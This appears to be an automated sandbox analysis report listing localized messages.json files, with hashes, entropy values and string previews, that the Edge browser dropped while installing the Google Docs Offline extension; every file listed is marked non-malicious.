                                                                                                                                                                                                                                                                                              SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                              SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                              MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                              SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                              SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                              SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3107
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                              MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                              SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                              SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                              SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1389
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                              MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                              SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                              SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                              SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1763
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                              MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                              SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                              SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                              SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):930
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                              MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                              SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                              SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                              SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):913
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                              MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                              SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                              SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                              SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):806
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                              MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                              SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                              SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                              SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                              MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                              SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                              SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                              SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                              MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                              SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                              SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                              SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1613
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                              MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                              SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                              SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                              SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):848
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                              MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                              SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                              SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                              SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1425
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                              MD5:578215FBB8C12CB7E6CD73FBD16EC994
